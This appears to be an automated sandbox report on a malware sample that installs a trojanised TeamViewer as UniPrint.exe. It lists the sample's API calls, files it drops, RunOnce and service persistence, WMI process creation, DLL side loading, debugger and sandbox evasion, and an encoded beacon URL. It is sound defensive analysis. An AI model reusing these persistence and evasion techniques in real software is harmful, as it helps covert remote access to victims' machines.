Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004C6E36 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPC
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Local\Temp\nsrC1C9.tmp
Source: nsrC1CA.tmp.0.drBinary string: Driver.GetDriverIPAddress.GetAdaptersInfo2.Error = Driver.GetDriverIPAddress.Memory allocation errorDriver.GetDriverIPAddress.GetAdaptersInfo.Error = Driver.NoSubkeys DriverConnector.GetGUIDfromRegistry: RegCloseKey(unit_key) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(component_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(net_cfg_instance_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegCloseKey(adapter_key) failed with error Driver.KeyError ComponentIdDriver.NoRegKey SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}DriverConnector.RemoveIPAddresses: DeleteIPAddress() failed with error DriverConnector.Close: CloseHandle failed\DEVICE\TCPIP_CDriverConnector::Init() GetIndex failed DriverConnector.Init: GetGUIDfromRegistry failedDriverConnector.Open: FlushIpNetTable failed with error DriverConnector.Open: IpRenewAddress failed with error Driver.Invalid.IPDriver.TAP_IOCTL_SET_MEDIA_STATUS.RejectedDriver.GetMAC.FailedDriver.DHCP.Failed1.0.0.7255.0.0.0DriverConnector.Open: DeviceIOControl(MTU) failedDriverConnector.Open: CreateFile failed with error \\.\Global\.dgt
Source: classification engineClassification label: mal72.evad.winEXE@13/7@4/5
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2AC0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,StrChrW,StrChrW,SysAllocString,StrChrW,SysAllocString,SysFreeString,VariantInit,VariantInit,StrChrW,StrChrW,lstrlenW,SysAllocStringLen,PathQuoteSpacesW,VariantInit,StrChrW,SysAllocString,StrChrW,VariantInit,StrChrW,StrChrW,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Code function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,73D5A680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C9B10 SwitchDesktop,SetThreadDesktop,LoadLibraryW,GetProcessHeap,HeapAlloc,RtlZeroMemory,GetSystemDirectoryW,PathAddBackslashW,lstrcatW,LoadLibraryExW,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,StrChrW,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C3920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAMOEBAAAA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C5180 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,
Source: C:\Users\user\Desktop\wogZe27GBB.exe | File written: C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.ini
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: wogZe27GBB.exe | Static file information: File size 1773472 > 1048576
Source: wogZe27GBB.exe | Static PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000002.707742521.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1076091636.000000006E5CC000.00000002.00020000.sdmp, svchost.exe, 00000007.00000002.1072106592.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759626756.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.762333599.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000002.776275044.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.780622367.000000006E5CC000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, nsrC1CA.tmp.0.dr
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_0053E60D push ecx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_0053BD8D push ecx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 11_3_029AFAC6 push eax; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 11_3_029B24F9 pushfd ; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 12_2_027E6D2C push ds; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 12_2_027E6FCC push esi; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 14_3_0285EBC8 push eax; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 14_3_0282E9D5 push ebp; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 14_3_0282E35C push ebp; iretd
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 14_3_0282E57C push ecx; retf
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exe | File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe | File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe | File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C3920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_00500C6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_004FFF68
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 3040 | Thread sleep count: 301 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 3040 | Thread sleep time: -150500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 5512 | Thread sleep count: 294 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 5512 | Thread sleep time: -147000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6328 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_004FFF68
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | Binary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | Binary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU{*4
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | Binary or memory string: http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: UniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmp | Binary or memory string: J6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | Binary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pUN*i
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | Binary or memory string: ?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C54A0 LogonUserW,GetLastError,CloseHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C34E0 OpenProcessToken,HeapAlloc,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidW,FreeSid,GetProcessHeap,HeapFree,CloseHandle,
Source: UniPrint.exe, 00000005.00000002.1075366890.0000000003CB0000.00000004.00000001.sdmp | Binary or memory string: Program Manager
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: UniPrint.exe, 00000005.00000002.1075366890.0000000003CB0000.00000004.00000001.sdmp | Binary or memory string: usercomputerusProgram ManagerC:\Windows\explorer.exe3910574588847
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: nsrC1CA.tmp.0.dr | Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Queries volume information: C:\ VolumeInformation
